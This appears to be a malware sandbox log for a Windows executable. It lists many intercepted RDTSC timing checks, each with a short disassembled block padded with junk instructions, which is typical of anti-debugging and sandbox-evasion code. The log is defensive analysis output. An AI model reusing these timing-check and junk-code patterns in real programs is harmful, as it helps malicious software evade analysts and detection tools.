Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F07F47 second address: F07F51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F07F51 second address: F07F68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4224E6F2B3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F07F68 second address: F07F82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4224DD3FDEh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F07F82 second address: F07F86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F08131 second address: F0813C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0813C second address: F0814E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4224E6F2AEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F082C0 second address: F082CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007F4224DD3FD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F08564 second address: F08586 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4224E6F2B2h 0x00000008 jnp 00007F4224E6F2A6h 0x0000000e js 00007F4224E6F2A6h 0x00000014 jl 00007F4224E6F2B2h 0x0000001a je 00007F4224E6F2A6h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F086FB second address: F08711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4224DD3FDFh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0BC04 second address: F0BC08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0BC08 second address: F0BC14 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0BC14 second address: F0BC1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0BC1A second address: F0BC1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0BC1E second address: F0BC60 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4224E6F2A6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jbe 00007F4224E6F2B7h 0x00000012 jmp 00007F4224E6F2B1h 0x00000017 jmp 00007F4224E6F2B6h 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push ebx 0x00000022 pop ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0BC60 second address: F0BC64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0BC64 second address: F0BC8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F4224E6F2B4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnl 00007F4224E6F2ACh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0BC8A second address: F0BC94 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4224DD3FDEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0BC94 second address: F0BCAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007F4224E6F2B1h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E7527B second address: E7527F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0B7CC second address: F0B7DA instructions: 0x00000000 rdtsc 0x00000002 je 00007F4224E6F2A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0B7DA second address: F0B7F6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F4224DD3FE3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0B7F6 second address: F0B7FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0E138 second address: F0E13E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0E13E second address: F0E142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0E142 second address: F0E167 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F4224DD3FD6h 0x00000010 jmp 00007F4224DD3FE5h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0E167 second address: F0E16B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0E16B second address: F0E171 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8ADB8 second address: E8ADBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8ADBE second address: E8ADC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8ADC4 second address: E8ADC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8ADC9 second address: E8ADCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8ADCF second address: E8ADE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4224E6F2ABh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8ADE5 second address: E8ADEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F4224DD3FD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0DCDB second address: F0DCDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0DCDF second address: F0DCE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0DCE3 second address: F0DCFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F4224E6F2A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F4224E6F2AEh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0DCFD second address: F0DD02 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0DD02 second address: F0DD0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F12AC5 second address: F12ACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F12ACC second address: F12AF0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F4224E6F2B8h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F12AF0 second address: F12AFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F4224DD3FD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F12AFA second address: F12B1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F4224E6F2B9h 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F12B1B second address: F12B27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F4224DD3FD6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F12B27 second address: F12B36 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4224E6F2A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F12DC5 second address: F12DCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F12DCD second address: F12DD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F12DD2 second address: F12DD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F13029 second address: F1302E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F16D34 second address: F16D3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1B6C8 second address: F1B6CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1B6CC second address: F1B6E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F4224DD3FD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F4224DD3FDBh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1B6E6 second address: F1B70A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F4224E6F2A6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4224E6F2B3h 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1B84E second address: F1B85C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1B85C second address: F1B870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 popad 0x00000008 jne 00007F4224E6F2B2h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1B9B4 second address: F1BA01 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4224DD3FE9h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F4224DD3FE1h 0x00000010 jmp 00007F4224DD3FE5h 0x00000015 push ebx 0x00000016 jnp 00007F4224DD3FD6h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1BA01 second address: F1BA10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 je 00007F4224E6F2A6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1BB32 second address: F1BB3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1BB3C second address: F1BB46 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4224E6F2A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1BB46 second address: F1BBBA instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4224DD3FFBh 0x00000008 jmp 00007F4224DD3FE6h 0x0000000d jmp 00007F4224DD3FDFh 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jc 00007F4224DD3FEBh 0x0000001c jmp 00007F4224DD3FE5h 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F4224DD3FE7h 0x00000028 jmp 00007F4224DD3FDFh 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1BBBA second address: F1BBC0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1BBC0 second address: F1BBC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1BBC7 second address: F1BBCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1BE60 second address: F1BE6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F4224DD3FD6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1BE6C second address: F1BE9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4224E6F2B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4224E6F2B4h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC8CAB second address: EC8CB7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1CA18 second address: F1CA1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1CA1C second address: F1CA20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1CA20 second address: F1CA26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1CA26 second address: F1CA30 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4224DD3FDCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1CA30 second address: F1CA39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F250C1 second address: F250CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F4224DD3FD6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F233C7 second address: F233CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F233CB second address: F233D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F233D3 second address: F233D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F233D9 second address: F233DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F23703 second address: F23707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F23707 second address: F2370B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F2370B second address: F23713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F23713 second address: F23726 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jp 00007F4224DD3FD6h 0x0000000b jns 00007F4224DD3FD6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F2399B second address: F239A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F4224E6F2A6h 0x0000000a pop edi 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F244B5 second address: F244E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4224DD3FDCh 0x00000009 popad 0x0000000a pushad 0x0000000b jo 00007F4224DD3FD6h 0x00000011 jmp 00007F4224DD3FE8h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F244E7 second address: F244F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F24803 second address: F24809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F24809 second address: F2480E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F24DBF second address: F24DCF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 ja 00007F4224DD3FD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F24DCF second address: F24DD9 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4224E6F2A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F24DD9 second address: F24DDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F24DDF second address: F24DE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F4224E6F2A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F26697 second address: F2669B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F2EE54 second address: F2EE73 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4224E6F2A6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F4224E6F2B3h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F2EE73 second address: F2EE7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F4224DD3FD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F2F3CF second address: F2F3F0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F4224E6F2B7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F2F3F0 second address: F2F3FA instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4224DD3FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F35977 second address: F3599F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F4224E6F2B8h 0x0000000c push eax 0x0000000d pop eax 0x0000000e push edi 0x0000000f pop edi 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3599F second address: F359A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F359A3 second address: F359AD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F35F0F second address: F35F13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F35F13 second address: F35F26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F4224E6F2A8h 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F35F26 second address: F35F2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F35F2C second address: F35F43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4224E6F2ABh 0x0000000d push ebx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F35F43 second address: F35F49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
